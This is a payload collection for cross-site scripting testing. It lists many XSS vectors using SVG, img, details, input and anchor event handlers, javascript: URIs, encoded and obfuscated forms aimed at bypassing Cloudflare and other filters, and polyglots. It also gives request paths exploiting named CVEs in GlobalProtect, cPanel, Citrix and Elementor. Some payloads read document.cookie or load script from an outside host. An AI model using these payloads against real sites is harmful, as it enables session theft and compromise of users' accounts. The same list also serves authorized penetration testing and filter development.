XSS Payloads
Security Testing Payload Collection
XSS Payloads
Open Redirect to XSS
Swagger XSS
Polyglots XSS
CVEs
Tricks
1--><Svg%0COnLoad=(confirm)(1)>
<svg only=1 onload=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert(document.cookie)>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Svg Only=1 OnLoad=confirm(atob("MQ=="))>
<svg onload='new Function*["Y000!"].find(al\u0065rt)*'>
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/>
<h1 onmouseover="alert(1)">TESTTTTT</h1>
<h1 onauxclick=confirm``>RIGH-CLICK-HERE
<h1 onwheel="alert('Wheel scrolled!')">Scroll the mouse wheel here</h1>
<h2 onpointerrawupdate="prompt``">test</h1>
<script /*%00*/>/*%00*/prompt``/*%00*/</script /*%00*/
<script x='a@b'a> y='a@b'//a@b%0A\u0061lert``</script x>
<!--><script>alert(1)</script>
1"*%2Fconfirm%0B(1)<%2FScript%2F--><Script>%2F*
1")AutoFocus/ContentEditable/OnFocusIn=(confirm)(1)//
<body oNpagEshoW=(confirm)(1)>
<body onpageshow="alert(1)">
<input type="checkbox" id="z" value="y" style="display:none" &%2362;="" onchange="top[['alert'][0]](location.hostname);this.remove()"><label for="z" style="position:fixed;inset:0;cursor:crosshair"></label>
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">
<input name=tset autofocus %26%23x3e%3b%20 onfocus=alert(1)>
<input type="password" id="CF-bypaSS" name="query" value="" onfocus="alert('1')" autofocus="" />
<details x=xxxXxXXXXXXXXXXXXXXXXXXXXXXXXKXXXXXXXXXXX 2 Open ontoggle=ka(alert(origin))>
<details/open/ontoggle=confirm('XSS')>
<details open ontoggle="(()=>confirm`1`)()">
<details open ontoggle='let x=`javascri`;let y=`pt:aler`;let z=`t()`;let a=x+y+z;location=a'><summary>Click Me</summary></details>
<img src onerror='let x=`javascri`;let y=`pt:aler`;let z=`t()`;let a=x+y+z;location=a'>
1'"><%0AImg Src=On%0AXSS On%0AError=alert(1)>
1")--><Title/</Style/</Textarea/</Iframe/<Img/Src/OnError=(confirm)(1)//
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img src="/" =_=" title="onerror='prompt(1)'">
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img src=x onerror=window.onerror=alert;throw'1'>
<img/src=="x onerror=alert(1)//">
"%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>
"><img/src/onerror=.1|alert``>
%3cimg%2fsrc%2fonerror%3dalert%2f%2f%26NewLine%3b(2)%3e
%3cImg%20Src%3dOnXSS%20OnError%3dconfirm(1337)%3e
<Img Src=OnXSS OnError=confirm(1337)>
<image onerror=alert() src>
<img usemap=#x style=position:fixed;inset:0;width:100%;height:100%><map name=x><area coords=",,9999,9999" href=javascript:alert(0)>
<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">
"><img/src/x/onerror="...">
1"-->'<A HRef=//X55.is AutoFocus OnFocus=(confirm)(1)><Base K='
<A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<a href="%09jav%09ascript:parent[['al','ert'].join('')](origin)">click</a>
</<a/href="><svg/onload=alert(45)>">
<iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
<form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
<frameset onpageshow="alert(1)">
<video><source onerror="alert(1)">
<textarea autofocus onfocus="a=eval;b=alert;a(b(/g/.source));">
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOUSE HERE</code>
<div autofocus contenteditable onfocus=alert(1)>
<object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<meta http-equiv=refresh content=0,#x id=x onbeforematch=alert() hidden=until-found>
<buggedout ContentEditable AutoFocus OnFocus=alert(1)>
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+['b','c','d'][0]]('YWxlcnQoKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1</div></address>
<0 name="<svg/onload=alert()>">
" onfocus="alert(1)" autofocus="
javascript:/*test*/alert(1)
javascript:eval("alert(1)")
javascript:(Function("alert(1)"))()
javascript:(new Function("alert(1)"))()
javascript:\u0061lert(1)
javascript:window
javascript:\u0061\u006c\u0065\u0072\u0074(1)
javascript%3A%28new%20Function%28%27ale%27%2B%27rt%281%29%27%29%29%28%29
%6a%61%76%61%73%63%72%69%70%74:alert(1)
java%0d%0ascript%0d%0a:alert(0)
javascript://%250Aalert(1)
%09Jav%09ascript:alert(document.domain)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
javascript:'a'.replace.call`1${/./}${alert}`
javascript:'a'.replace(/./,alert)
javascript:'a,'.replace`a${alert}`
?url=https://jumpy-floor.surge.sh/test.yaml ?configUrl=https://jumpy-floor.surge.sh/test.json
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
CVE-2025-0133
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
--------------------------------------------------------------------------------------------------------------------------------
CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt%28document.domain%29">TESTER
--------------------------------------------------------------------------------------------------------------------------------
Citrix XSS + open redirect
/oauth/idp/logout?post_logout_redirect_uri=attacker.com
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.cookie)</script>
--------------------------------------------------------------------------------------------------------------------------------
Elementor lightbox action (CVE ID not given)
/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
--------------------------------------------------------------------------------------------------------------------------------
{alert`1`}
(alert)`1`
setTimeout`alert\`1\``
(1).constructor.constructor('al'+'ert(1)')()
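# also: top | window | self in place of parent — each exposes the same global functions, so matching on one of these names alone is not enough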
parent[['al','ert'].join('')](1)
parent[/al/.source.concat(/ert/.source)](2)
parent[[/al/.source,/ert/.source].join('')](2)
parent[`${/al/.source}${/ert/.source}`](2)
parent['\x61\x6c\x65\x72\x74'](1)
parent[/*foo*/'confirm'/*bar*/](window)
parent[8680439..toString(30)](1)